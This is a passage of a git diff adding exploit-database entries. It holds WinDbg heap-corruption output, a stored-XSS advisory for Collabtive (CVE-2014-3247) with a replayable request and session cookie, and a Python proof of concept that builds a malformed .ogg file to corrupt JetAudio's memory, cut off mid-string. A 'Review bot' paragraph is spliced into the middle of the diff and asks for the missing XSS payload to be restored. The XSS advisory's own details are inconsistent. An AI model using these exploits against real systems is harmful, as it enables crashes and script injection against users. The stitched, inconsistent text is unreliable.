. 002a8 [01] - busy (29c) + 00a5bc58: 002a8 . 00278 [01] - busy (270) + 00a5bed0: 00278 . 00248 [01] - busy (23c) + 00a5c118: 00248 . 00278 [01] - busy (270) + 00a5c390: 00278 . 00278 [01] - busy (270) + 00a5c608: 00278 . 00248 [01] - busy (23c) + 00a5c850: 00248 . 00248 [01] - busy (23c) + 00a5ca98: 00248 . 00248 [01] - busy (23c) + 00a5cce0: 00248 . 00248 [01] - busy (23c) + 00a5cf28: 00248 . 00248 [01] - busy (23c) + 00a5d170: 00248 . 00248 [01] - busy (23c) + 00a5d3b8: 00248 . 001a0 [01] - busy (194) + 00a5d558: 001a0 . 00248 [01] - busy (23c) + 00a5d7a0: 00248 . 00248 [01] - busy (23c) + 00a5d9e8: 00248 . 00248 [01] - busy (23c) + 00a5dc30: 00248 . 00248 [01] - busy (23c) + 00a5de78: 00248 . 00248 [01] - busy (23c) + 00a5e0c0: 00248 . 00248 [01] - busy (23c) + 00a5e308: 00248 . 00248 [01] - busy (23c) + 00a5e550: 00248 . 00248 [01] - busy (23c) + 00a5e798: 00248 . 00248 [01] - busy (23c) + 00a5e9e0: 00248 . 00248 [01] - busy (23c) + 00a5ec28: 00248 . 002a8 [01] - busy (29c) + 00a5eed0: 002a8 . 002a8 [01] - busy (29c) + 00a5f178: 002a8 . 00248 [01] - busy (23c) + 00a5f3c0: 00248 . 
002a8 [01] - busy (29c) + 00a5f668: 002a8 . 002a8 [01] - busy (29c) + 00a5f910: 002a8 . 00248 [01] - busy (23c) + 00a5fb58: 00248 . 00248 [01] - busy (23c) + 00a5fda0: 00248 . 002a8 [01] - busy (29c) + 00a60048: 002a8 . 002a8 [01] - busy (29c) + 00a602f0: 002a8 . 002a8 [01] - busy (29c) + 00a60598: 002a8 . 002a8 [01] - busy (29c) + 00a60840: 002a8 . 002a8 [01] - busy (29c) + 00a60ae8: 002a8 . 002a8 [01] - busy (29c) + 00a60d90: 002a8 . 00248 [01] - busy (23c) + 00a60fd8: 00248 . 002a8 [01] - busy (29c) + 00a61280: 002a8 . 00248 [01] - busy (23c) + 00a614c8: 00248 . 00248 [01] - busy (23c) + 00a61710: 00248 . 00248 [01] - busy (23c) + 00a61958: 00248 . 00248 [01] - busy (23c) + 00a61ba0: 00248 . 002a8 [01] - busy (29c) + 00a61e48: 002a8 . 00280 [01] - busy (278) + 00a620c8: 00280 . 00280 [01] - busy (278) + 00a62348: 00280 . 00248 [01] - busy (23c) + 00a62590: 00248 . 00248 [01] - busy (23c) + 00a627d8: 00248 . 00248 [01] - busy (23c) + 00a62a20: 00248 . 00248 [01] - busy (23c) + 00a62c68: 00248 . 00248 [01] - busy (23c) + 00a62eb0: 00248 . 00248 [01] - busy (23c) + 00a630f8: 00248 . 00248 [01] - busy (23c) + 00a63340: 00248 . 00248 [01] - busy (23c) + 00a63588: 00248 . 00248 [01] - busy (23c) + 00a637d0: 00248 . 00248 [01] - busy (23c) + 00a63a18: 00248 . 00248 [01] - busy (23c) + 00a63c60: 00248 . 00248 [01] - busy (23c) + 00a63ea8: 00248 . 00248 [01] - busy (23c) + 00a640f0: 00248 . 00248 [01] - busy (23c) + 00a64338: 00248 . 00248 [01] - busy (23c) + 00a64580: 00248 . 00248 [01] - busy (23c) + 00a647c8: 00248 . 00248 [01] - busy (23c) + 00a64a10: 00248 . 00248 [01] - busy (23c) + 00a64c58: 00248 . 00248 [01] - busy (23c) + 00a64ea0: 00248 . 001c8 [01] - busy (1bc) + 00a65068: 001c8 . 00248 [01] - busy (23c) + 00a652b0: 00248 . 00248 [01] - busy (23c) + 00a654f8: 00248 . 00248 [01] - busy (23c) + 00a65740: 00248 . 00220 [01] - busy (218) + 00a65960: 00220 . 00248 [01] - busy (23c) + 00a65ba8: 00248 . 00248 [01] - busy (23c) + 00a65df0: 00248 . 
00278 [01] - busy (270) + 00a66068: 00278 . 00248 [01] - busy (23c) + 00a662b0: 00248 . 00248 [01] - busy (23c) + 00a664f8: 00248 . 00248 [01] - busy (23c) + 00a66740: 00248 . 00248 [01] - busy (23c) + 00a66988: 00248 . 00118 [01] - busy (110) + 00a66aa0: 00118 . 00248 [01] - busy (23c) + 00a66ce8: 00248 . 00248 [01] - busy (23c) + 00a66f30: 00248 . 00118 [01] - busy (110) + 00a67048: 00118 . 00248 [01] - busy (23c) + 00a67290: 00248 . 00248 [01] - busy (23c) + 00a674d8: 00248 . 00220 [01] - busy (218) + 00a676f8: 00220 . 00248 [01] - busy (23c) + 00a67940: 00248 . 00248 [01] - busy (23c) + 00a67b88: 00248 . 00248 [01] - busy (23c) + 00a67dd0: 00248 . 00248 [01] - busy (23c) + 00a68018: 00248 . 00248 [01] - busy (23c) + 00a68260: 00248 . 00248 [01] - busy (23c) + 00a684a8: 00248 . 00248 [01] - busy (23c) + 00a686f0: 00248 . 00248 [01] - busy (23c) + 00a68938: 00248 . 00248 [01] - busy (23c) + 00a68b80: 00248 . 00248 [01] - busy (23c) + 00a68dc8: 00248 . 00248 [01] - busy (23c) + 00a69010: 00248 . 00248 [01] - busy (23c) + 00a69258: 00248 . 00130 [01] - busy (128) + 00a69388: 00130 . 00248 [01] - busy (23c) + 00a695d0: 00248 . 00248 [01] - busy (23c) + 00a69818: 00248 . 00118 [01] - busy (110) + 00a69930: 00118 . 00248 [01] - busy (23c) + 00a69b78: 00248 . 00248 [01] - busy (23c) + 00a69dc0: 00248 . 00248 [01] - busy (23c) + 00a6a008: 00248 . 002a8 [01] - busy (29c) + 00a6a2b0: 002a8 . 00248 [01] - busy (23c) + 00a6a4f8: 00248 . 00248 [01] - busy (23c) + 00a6a740: 00248 . 00248 [01] - busy (23c) + 00a6a988: 00248 . 00248 [01] - busy (23c) + 00a6abd0: 00248 . 00248 [01] - busy (23c) + 00a6ae18: 00248 . 00248 [01] - busy (23c) + 00a6b060: 00248 . 00120 [01] - busy (118) + 00a6b180: 00120 . 00248 [01] - busy (23c) + 00a6b3c8: 00248 . 00248 [01] - busy (23c) + 00a6b610: 00248 . 00248 [01] - busy (23c) + 00a6b858: 00248 . 00248 [01] - busy (23c) + 00a6baa0: 00248 . 00248 [01] - busy (23c) + 00a6bce8: 00248 . 00248 [01] - busy (23c) + 00a6bf30: 00248 . 
00248 [01] - busy (23c) + 00a6c178: 00248 . 00248 [01] - busy (23c) + 00a6c3c0: 00248 . 00248 [01] - busy (23c) + 00a6c608: 00248 . 00148 [01] - busy (140) + 00a6c750: 00148 . 00160 [01] - busy (158) + 00a6c8b0: 00160 . 02018 [01] - busy (2010) + 00a6e8c8: 02018 . 01008 [01] - busy (1000) + 00a6f8d0: 01008 . 00ad8 [00] + 00a703a8: 00ad8 . 00120 [01] - busy (115) + 00a704c8: 00120 . 00358 [01] - busy (34d) + 00a70820: 00358 . 00188 [01] - busy (180) + 00a709a8: 00188 . 00110 [01] - busy (104) + 00a70ab8: 00110 . 00050 [01] - busy (40) + 00a70b08: 00050 . 00358 [01] - busy (34c) + 00a70e60: 00358 . 00168 [01] - busy (160) + 00a70fc8: 00168 . 00118 [01] - busy (109) + 00a710e0: 00118 . 001c8 [01] - busy (1c0) + 00a712a8: 001c8 . 00168 [01] - busy (160) + 00a71410: 00168 . 00210 [01] - busy (202) + 00a71620: 00210 . 001e0 [01] - busy (1d8) + 00a71800: 001e0 . 00188 [01] - busy (180) + 00a71988: 00188 . 000f8 [00] + 00a71a80: 000f8 . 01808 [01] - busy (1800) + 00a73288: 01808 . 01808 [01] - busy (1800) + 00a74a90: 01808 . 01808 [01] - busy (1800) + 00a76298: 01808 . 00188 [01] - busy (180) + 00a76420: 00188 . 00188 [01] - busy (180) + 00a765a8: 00188 . 001e0 [01] - busy (1d8) + 00a76788: 001e0 . 00308 [01] - busy (300) + 00a76a90: 00308 . 00608 [01] - busy (600) + 00a77098: 00608 . 00180 [01] - busy (178) + 00a77218: 00180 . 00168 [01] - busy (160) + 00a77380: 00168 . 00180 [01] - busy (178) + 00a77500: 00180 . 00168 [01] - busy (15c) + 00a77668: 00168 . 00198 [01] - busy (190) + 00a77800: 00198 . 001f8 [01] - busy (1ec) + 00a779f8: 001f8 . 00188 [01] - busy (17c) + 00a77b80: 00188 . 00170 [01] - busy (164) + 00a77cf0: 00170 . 00170 [01] - busy (168) + 00a77e60: 00170 . 00178 [01] - busy (170) + 00a77fd8: 00178 . 00198 [01] - busy (18c) + 00a78170: 00198 . 001f8 [01] - busy (1ec) + 00a78368: 001f8 . 00170 [01] - busy (164) + 00a784d8: 00170 . 00170 [01] - busy (164) + 00a78648: 00170 . 00168 [01] - busy (15c) + 00a787b0: 00168 . 
001b8 [01] - busy (1b0) + 00a78968: 001b8 . 00180 [01] - busy (174) + 00a78ae8: 00180 . 00188 [01] - busy (180) + 00a78c70: 00188 . 00100 [00] + 00a78d70: 00100 . 00180 [01] - busy (174) + 00a78ef0: 00180 . 00608 [01] - busy (600) + 00a794f8: 00608 . 00208 [01] - busy (200) + 00a79700: 00208 . 00188 [01] - busy (180) + 00a79888: 00188 . 00608 [01] - busy (600) + 00a79e90: 00608 . 00308 [01] - busy (300) + 00a7a198: 00308 . 00220 [01] - busy (214) + 00a7a3b8: 00220 . 003f8 [00] + 00a7a7b0: 003f8 . 003d0 [01] - busy (3c2) + 00a7ab80: 003d0 . 00248 [01] - busy (240) + 00a7adc8: 00248 . 00318 [01] - busy (30f) + 00a7b0e0: 00318 . 00228 [01] - busy (21e) + 00a7b308: 00228 . 00378 [01] - busy (370) + 00a7b680: 00378 . 00168 [01] - busy (160) + 00a7b7e8: 00168 . 00278 [01] - busy (270) + 00a7ba60: 00278 . 001e0 [01] - busy (1d8) + 00a7bc40: 001e0 . 00520 [01] - busy (518) + 00a7c160: 00520 . 00268 [01] - busy (25e) + 00a7c3c8: 00268 . 00178 [01] - busy (16f) + 00a7c540: 00178 . 00120 [01] - busy (116) + 00a7c660: 00120 . 00170 [01] - busy (167) + 00a7c7d0: 00170 . 00268 [01] - busy (25a) + 00a7ca38: 00268 . 003d8 [01] - busy (3cf) + 00a7ce10: 003d8 . 004d0 [01] - busy (4c2) + 00a7d2e0: 004d0 . 00408 [01] - busy (3fa) + 00a7d6e8: 00408 . 00118 [01] - busy (10c) + 00a7d800: 00118 . 00118 [01] - busy (10c) + 00a7d918: 00118 . 001a0 [01] - busy (197) + 00a7dab8: 001a0 . 00118 [01] - busy (10c) + 00a7dbd0: 00118 . 00608 [01] - busy (600) + 00a7e1d8: 00608 . 001e0 [01] - busy (1d8) + 00a7e3b8: 001e0 . 00188 [01] - busy (17b) + 00a7e540: 00188 . 00228 [01] - busy (21b) + 00a7e768: 00228 . 00068 [01] - busy (5c) + 00a7e7d0: 00068 . 00010 [01] - busy (4) + 00a7e7e0: 00010 . 00160 [01] - busy (154) + 00a7e940: 00160 . 00188 [01] - busy (180) + 00a7eac8: 00188 . 00160 [01] - busy (158) + 00a7ec28: 00160 . 00188 [01] - busy (180) + 00a7edb0: 00188 . 00160 [01] - busy (154) + 00a7ef10: 00160 . 00188 [01] - busy (180) + 00a7f098: 00188 . 00c08 [01] - busy (c00) + 00a7fca0: 00c08 . 
001a8 [01] - busy (1a0) + 00a7fe48: 001a8 . 00188 [01] - busy (180) + 00a7ffd0: 00188 . 00018 [01] - busy (c) + 00a7ffe8: 00018 . 00018 [11] - busy (c) + Segment02 at 00a80000: + Flags: 00000000 + Base: 00a80000 + First Entry: 00a80040 + Last Entry: 00c80000 + Total Pages: 00000200 + Total UnCommit: 00000175 + Largest UnCommit:00172000 + UnCommitted Ranges: (2) + 00acb000: 00003000 + 00b0e000: 00172000 + + Heap entries for Segment02 in Heap 00970000 + 00a80000: 00000 . 00040 [01] - busy (40) + 00a80040: 00040 . 40008 [01] - busy (40000) + 00ac0048: 40008 . 00170 [01] - busy (164) + 00ac01b8: 00170 . 01808 [01] - busy (1800) + 00ac19c0: 01808 . 00408 [01] - busy (400) + 00ac1dc8: 00408 . 000c8 [01] - busy (c0) + 00ac1e90: 000c8 . 000c8 [01] - busy (c0) + 00ac1f58: 000c8 . 000a8 [01] - busy (93) + 00ac2000: 000a8 . 03008 [01] - busy (3000) + 00ac5008: 03008 . 00460 [01] - busy (453) + 00ac5468: 00460 . 00190 [01] - busy (188) + 00ac55f8: 00190 . 00188 [01] - busy (180) + 00ac5780: 00188 . 00170 [01] - busy (164) + 00ac58f0: 00170 . 00170 [01] - busy (164) + 00ac5a60: 00170 . 000d0 [00] + 00ac5b30: 000d0 . 001a0 [01] - busy (196) + 00ac5cd0: 001a0 . 001e0 [01] - busy (1d8) + 00ac5eb0: 001e0 . 05150 [10] + 00acb000: 00003000 - uncommitted bytes. + 00ace000: 00000 . 00018 [01] - busy (10) + 00ace018: 00018 . 00018 [01] - busy (10) + 00ace030: 00018 . 00198 [01] - busy (18f) + 00ace1c8: 00198 . 001e8 [01] - busy (1d9) + 00ace3b0: 001e8 . 00118 [01] - busy (10f) + 00ace4c8: 00118 . 003f8 [01] - busy (3eb) + 00ace8c0: 003f8 . 00168 [01] - busy (15a) + 00acea28: 00168 . 003e8 [01] - busy (3dc) + 00acee10: 003e8 . 001e0 [01] - busy (1d7) + 00aceff0: 001e0 . 00130 [01] - busy (128) + 00acf120: 00130 . 00030 [00] + 00acf150: 00030 . 001e0 [01] - busy (1d8) + 00acf330: 001e0 . 00160 [01] - busy (154) + 00acf490: 00160 . 001e0 [01] - busy (1d8) + 00acf670: 001e0 . 00160 [01] - busy (154) + 00acf7d0: 00160 . 001e0 [01] - busy (1d8) + 00acf9b0: 001e0 . 
000c8 [01] - busy (c0)
+ 00acfa78: 000c8 . 00160 [01] - busy (158)
+ 00acfbd8: 00160 . 001e0 [01] - busy (1d8)
+ 00acfdb8: 001e0 . 00188 [01] - busy (180)
+ 00acff40: 00188 . 0c008 [01] - busy (c000)
+ 00adbf48: 0c008 . 20020 [01] - busy (20015)
+ 00afbf68: 20020 . 10020 [01] - busy (10015)
+ 00b0bf88: 10100 . 10100 [20]
+ unable to read heap entry at 00b1c088
+
+The error message shown by windbg "unable to read heap entry at.." partially confirms that its a sign of memory / heap corruption.
+
+0:000> dt _HEAP_ENTRY 00adbf48
+ntdll!_HEAP_ENTRY
+ +0x000 Size : 0x4004
+ +0x002 PreviousSize : 0x1801
+ +0x000 SubSegmentCode : 0x18014004
+ +0x004 SmallTagIndex : 0xc3 ''
+ +0x005 Flags : 0x1 ''
+ +0x006 UnusedBytes : 0xb ''
+ +0x007 SegmentIndex : 0x2 ''
+
+
+0:000> dt _HEAP_ENTRY 00afbf68
+ntdll!_HEAP_ENTRY
+ +0x000 Size : 0x2004
+ +0x002 PreviousSize : 0x4004
+ +0x000 SubSegmentCode : 0x40042004
+ +0x004 SmallTagIndex : 0xc7 ''
+ +0x005 Flags : 0x1 ''
+ +0x006 UnusedBytes : 0xb ''
+ +0x007 SegmentIndex : 0x2 ''
+
+Above two entries actually make sense. size and previous size matches for both of them. Now lets dessect the last entry
+
+0:000> dt _HEAP_ENTRY 00b0bf88
+ntdll!_HEAP_ENTRY
+ +0x000 Size : 0x2020
+ +0x002 PreviousSize : 0x2020
+ +0x000 SubSegmentCode : 0x20202020
+ +0x004 SmallTagIndex : 0x20 ' '
+ +0x005 Flags : 0x20 ' '
+ +0x006 UnusedBytes : 0x20 ' '
+ +0x007 SegmentIndex : 0x20 ' '
+
+From above windbg output, it can be seen that metadata of 0x00b0bf88 is completely corrupted and overwritten with 0x20s which is nothing but spaces.
+
+0:000> dd 00b0bf88
+00b0bf88 20202020 20202020 20202020 20202020
+00b0bf98 20202020 20202020 20202020 20202020
+00b0bfa8 20202020 20202020 20202020 20202020
+00b0bfb8 20202020 20202020 20202020 20202020
+00b0bfc8 20202020 20202020 20202020 20202020
+00b0bfd8 20202020 20202020 20202020 20202020
+00b0bfe8 20202020 20202020 20202020 20202020
+00b0bff8 20202020 20202020 20202020 20202020
diff --git a/platforms/php/webapps/33250.txt b/platforms/php/webapps/33250.txt
new file mode 100755
index 000000000..648cd2479
--- /dev/null
+++ b/platforms/php/webapps/33250.txt
@@ -0,0 +1,51 @@
+Vulnerability title: Stored XSS vulnerability in Collabtive application
+(CVE-2014-3247)
+CVE: CVE-2014-3247(coordinated with cve assigning team and vendor)
+Vendor: Collabtive
+Product: Collabtive (Open Source Project Management Software)
+Affected version: 1.12
+Fixed version: 2.0
+Reported by: Deepak Rathore
+Severity: Critical
+URL: http://[domain]/collabtive-12/admin.php?action=addpro
+Affected Users: Authenticated users
+Affected parameter(s): desc
+
+Issue details: The value of the desc request parameter is copied into the
+HTML document as plain text between tags. The payload 1c91ccc245622da6 was submitted in the desc parameter.
+This input was echoed as 1c91ccc245622da6 in
+the application's response. This proof-of-concept attack demonstrates that
+it is possible to inject arbitrary JavaScript into the application's
+response. The proof-of-concept attack demonstrated uses an event handler to
+introduce arbitrary JavaScript into the document.
+
+HTTP request:
+POST /collabtive-12/admin.php?action=addpro HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101
+Firefox/28.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/collabtive-12/index.php?mode=login
+Cookie: PHPSESSID=ri2sqmga763p7qav73enfv99p5
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 75
+name=test&desc=test928a4a480a723950&neverdue=neverdue&budget=10&assignto%5B%5D=1&assignme=1
+
+Steps to replicate:
+1. Login into application
+2. Go to "Desktop" tab and click on "Add project"
+3. Fill the project details in the project form and click on "Add" button
+4. Intercept request by interception proxy i.e. OWASP Zap, Burp Suite etc
+5. Replace "desc" parameter value with "1c91ccc245622da6"
+6. Forward manipulated request to server and wait for response in browser
+7. A popup with alert message will come that is the proof of vulnerability.
+
+Tools used: Burp Suite proxy, Mozilla Firefox browser
+
+Best Regards,
+Deepak
diff --git a/platforms/windows/dos/33332.py b/platforms/windows/dos/33332.py
new file mode 100755
index 000000000..dbec6556a
--- /dev/null
+++ b/platforms/windows/dos/33332.py
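Review bot: The proof of concept is not reproducible as written: the "Issue details" paragraph says the payload uses an event handler to introduce JavaScript, yet the only payload given there, in step 5 and in the POST body is the bare marker string `1c91ccc245622da6` / `test928a4a480a723950` with no tag or attribute, so the markup appears to have been lost when the advisory was formatted (the hunk header also announces 51 lines while 49 are present). The quoted `Content-Length: 75` does not match the body that follows (about 91 bytes), a second sign that the request shown is not the one that was actually sent; both should be corrected so a reader can replay it. I would restore the literal tag and event-handler attribute that were used in step 5 and in the `desc=` field, and note that the `PHPSESSID` value is a live session identifier that should be redacted. Separately, `Severity: Critical` for a stored XSS that needs an authenticated account to plant (`Affected Users: Authenticated users`) should be justified, for example by stating which privileged users render the stored `desc` value.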
@@ -0,0 +1,187 @@ +''' +# Exploit Title: [JetAudio memory corruption in latest Version 8.1.1 ] +# Date: [2014/05/08] +# Exploit Author: [Aryan Bayaninejad] +# Linkedin : [https://www.linkedin.com/profile/view?id=276969082] +# Vendor Homepage: [www.jetaudio.com] +# Version: [Version 8.1.1 and prior to that] +# Tested on: [Windows Xp Sp 3 x86] +# Found by : Piece Dumb Fuzzer +# CVE : [2014-3443] + +details: + +Jetaudio latest version V 8.1.1 suffers from an memory corruption +Vulnerability via a malformed .ogg file format when load JetMPAd.ax + + +Poc: +''' + +#!/usr/bin/python +data = +"\x4F\x67\x67\x53\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x55\x0B\x00\x00\x00\x00\x00\x00\xC7\x72\x7C\x6F\x01\x1E\x01\x76\x6F\x72\x62\x69\x73\x00\x00\x00\x00\x05\x99\xAC\x00\x00\xFD\xFF\xCF\xFC\x09\xFF\x99\x0F\xF9\x0F\x8F\x7F\xB9\x01\x4F\x67\x67\x53\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55\x0B\x00\x00\x01\x00\x00\x00\x15\x5A\x7E\x0C\x11\x4A\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x03\x76\x6F\x72\x62\x69\x73\x00\x00\x00\x00\x58\x69\x70\x68\x2E\x4F\x72\x67\x20\x6C\x69\x62\x56\x6F\x72\x62\x69\x73\x20\x49\x20\x32\x30\x30\x32\x30\x37\x31\x37\x01\x00\x00\x00\x19\x00\x00\x00\x53\x6F\x6E\x79\x20\x4F\x67\x67\x20\x56\x6F\x72\x62\x69\x73\x20\x31\x2E\x30\x20\x46\x69\x6E\x61\x6C\x01\x05\x76\x6F\x72\x62\x69\x73\x29\x42\x43\x56\x01\x00\x08\x00\x00\x80\x22\x4C\x20\xC3\x80\xD0\x90\x55\x00\x00\x10\x00\x00\x80\xA8\x36\x14\x6B\xA9\xB1\xD6\x1A\x63\xA1\x28\x46\xD4\x62\x6A\x31\xC6\x18\x63\xE3\x2C\x46\x90\x62\x8B\x31\xC6\x18\x63\x8C\x31\xC6\x18\x63\x8C\x31\xC6\x18\x63\x20\x34\x64\x15\x00\x00\x04\x00\x40\x31\xEA\x15\x93\x9E\x42\xCC\x39\xE7\xDC\x18\xA6\x8D\x51\xDA\x29\xC7\x39\xE7\xDC\x18\xC5\x89\x30\x58\x21\xA5\xB9\xA5\x9A\x52\xCC\xA1\x93\x9C\x4A\xCA\x39\xE7\x1C\x08\x0D\x59\x05\x00\x00\x02\x00\x40\x48\x21\x85\x14\x52\x48\x21\x85\x14\x52\x48\x21\x85\x14\x52\x4A\x29\xA5\x94\x62\x8A\x29\xA6\x98\x62\x8A\x29\xA6\x98\x72\xCC\x31\xC7\x1C\x83\x0C\x32\xE8\xA4\x93\x4E\x3A\xE9\x24\xA4\x90\x42\x0
9\xA5\xA4\x92\x52\x4A\xAD\xC5\x1A\x6B\xEF\xBD\xF7\x9E\x7B\xEF\xBD\xF7\xDE\x7B\xEF\xBD\xF7\xDE\x7B\xEF\xBD\xF7\xDE\x7B\xCF\x39\x07\x42\x43\x56\x01\x00\x20\x00\x00\x04\x42\x06\x21\x84\x10\x42\x08\x21\x84\x14\x52\x48\x21\xA6\x98\x62\xCA\x29\xA7\x80\xD0\x90\x55\x00\x00\x20\x00\x80\x00\x00\x00\x00\x4B\xB1\x14\x4D\xD1\x1C\xCF\xF1\x1C\xCF\x11\x1D\x53\x12\x25\x53\x32\x25\x53\x72\x2D\xD7\x32\x2D\x53\x33\x3D\xD3\x33\x45\x55\x74\x55\x53\x55\x65\xD7\x75\x65\x53\x36\x65\x53\x36\x65\x55\x36\x65\x53\x36\x65\x53\x36\x65\xD5\x95\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x20\x34\x64\x15\x00\x20\x01\x00\xA0\x23\x39\x92\x23\x29\x8E\xE2\x38\x8E\xE3\x48\x92\x04\x84\x86\xAC\x02\x00\x64\x00\x00\x04\x00\x60\x28\x8A\xA3\x48\x8E\x24\x59\x92\x65\x59\x96\x67\x99\x9A\xE9\x99\x9E\x69\x9A\xA6\x69\x9A\xA6\x09\x84\x86\xAC\x02\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\xA0\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\x66\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x40\x68\xC8\x2A\x00\x40\x02\x00\x40\xC7\x71\x1C\xC7\x71\x1C\xC7\x71\x1C\x47\x72\x24\x07\x08\x0D\x59\x05\x00\xC8\x00\x00\x08\x00\x40\x52\x24\xC5\x72\x34\x47\x73\x34\xC7\x73\x3C\x47\x74\x44\x47\x94\x4C\x49\x95\x5C\x4B\xB6\x64\x0D\x08\x0D\x59\x05\x00\x00\x02\x00\x08\x00\x00\x00\x00\x00\x40\x33\x2C\x43\x53\x3C\x47\xB3\x44\x4D\xD4\x44\x51\xF4\x44\x4F\x14\x45\xD1\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x80\xD0\x90\x55\x00\x00\x04\x00\x00\x01\x9D\x66\x98\x6A\x80\x08\x33\x92\x59\x20\x34\x64\x15\x00\x80\x00\x00\x00\x10\x81\x0C\x53\x0C\x08\x0D\x59\x05\x00\x00\x04\x00\x00\x48\x91\xE4\x24\x89\x92\x93\x52\x4A\x39\x0C\x92\xC5\x24\xA9\x94\x93\x52\x4A\x79\x14\x93\x47\x35\xC9\x18\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\x0C\x92\xE5\x28\xA9\x94\x93\x52\x4A\x49\x8C\x92\xC
5\x28\xA9\x52\x93\x52\x4A\x79\x94\x93\x27\x35\xC9\xD8\x93\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x59\x90\x92\x27\x2D\xE9\x1A\x94\x52\x4A\x49\x8E\x92\x06\x2D\xD9\xD4\x93\x52\x4A\x89\x52\x94\x28\x39\xD9\x9E\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\xF9\xA0\x94\x0F\x42\x29\xA5\x94\x52\x4A\xB9\xDA\x93\x6B\x3D\x29\xA5\x94\x52\x4A\x19\xA3\x94\xF0\x49\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\xCA\x08\x42\x43\x56\x01\x00\x40\x00\x00\x80\x71\xD6\x28\x87\xA2\x93\xE8\x7C\x71\x86\x72\xA6\x29\x48\x2A\x94\x26\x74\x6F\x92\xA3\xE4\x39\xC9\xAD\xB4\xDC\x9C\x6E\xC2\x39\xA7\x9B\x53\xCE\xF9\xE4\x9C\x73\x82\xD0\x90\x55\x00\x00\x20\x00\x00\x84\x10\x52\x48\x21\x85\x14\x52\x48\x21\x85\x14\x52\x88\x21\x86\x18\x72\xC8\x29\xA7\xA0\x82\x0A\x2A\xA9\xA4\xA2\x8A\x2A\xAA\xAC\xB2\xCC\x32\xCB\x2C\xB3\xCC\x32\xCB\x2C\xB3\xCC\x32\xEB\xAC\xA3\x8E\x3A\x0B\x29\x84\x92\x42\x0B\xAD\xD5\x18\x6B\x8C\xB1\xD5\xDE\x9C\xB4\x35\x47\x29\x9D\x94\x52\x4A\x29\xA5\x94\xCE\x39\xE7\x9C\x20\x34\x64\x15\x00\x00\x02\x00\x40\x20\x64\x90\x41\x06\x19\x65\x14\x52\x88\x21\xA6\x9C\x72\xCA\x29\xA8\xA4\x92\x0A\x08\x0D\x59\x05\x00\x00\x02\x00\x08\x00\x00\x00\x10\x25\xD3\x31\x1D\xD1\x11\x15\xD1\x11\x1D\xD1\x11\x1D\xD1\x11\x1D\xCF\xF1\x1C\x4F\x12\x25\xD1\xF2\x2C\x51\x33\x3D\x53\x34\x4D\xD3\x55\x65\x57\x96\x75\xD9\x96\x6D\x57\x97\x75\x5B\x97\x7D\xDB\xB7\x75\xDB\xB6\x7D\xDD\xD8\x8D\xDF\x38\x8E\xE3\x38\x8E\xE3\x38\x8E\xE3\x38\x8E\xE3\x38\x8E\x63\x08\x42\x43\x56\x01\x00\x20\x00\x00\x00\x42\x08\x21\x84\x14\x52\x48\x21\x85\x94\x62\x8A\x31\xE7\xA0\x83\x10\x42\x29\x81\xD0\x90\x55\x00\x00\x20\x00\x80\x00\x00\x00\x00\x45\x71\x14\xC7\x91\x1C\x49\x92\x24\x4B\xB2\x2C\xCD\xD2\x34\x4D\xD3\x34\x4F\xF4\x44\xCF\xF4\x54\xCF\x15\x65\xD1\x16\x6D\xCF\xF5\x6C\xD1\xF6\x5C\x4F\xF5\x54\x4F\x15\x55\x53\x35\x5D\xD3\x55\x5D\xD7\x75\x5D\xD5\x55\x65\x55\x76\x6D\xDB\xB6\x6D\xDB\xB6\x6D\xDB\xB6\x6D\xDB\xB6\x6D\xDB\xB6\x65\x20\x34\x64\x15\x00\x20\x01\x00\xA0\x23\x39\x92\x22\x29\x92\x22\x39\x8E\x23\x39\x92\x04\x84\x86\xAC\x02\x00\x64\x0
0\x00\x04\x00\xA0\x28\x8A\xE2\x38\x8E\xE4\x58\x92\x25\x69\x92\x28\x99\x96\x6A\xB9\x9A\xEC\xE9\x9E\x2E\xEA\xA2\x0E\x84\x86\xAC\x02\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x60\x88\x86\x68\x88\x8E\x68\x89\x9A\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x40\x68\xC8\x2A\x00\x40\x02\x00\x40\x47\x72\x24\xC7\x52\x2C\x45\x52\x24\xC5\x72\x2C\x07\x08\x0D\x59\x05\x00\xC8\x00\x00\x08\x00\xC0\x31\x1C\x43\x52\x24\xC7\xB2\x2C\x4B\xD3\x34\xCF\xF3\x3C\x4F\xF4\x44\x51\x14\x45\xD3\x54\x4D\x15\x08\x0D\x59\x05\x00\x00\x02\x00\x08\x00\x00\x00\x00\x00\x40\x51\x14\xCB\xB1\x1C\x49\xD2\x1C\x4F\x12\x1D\x51\x12\x25\xD1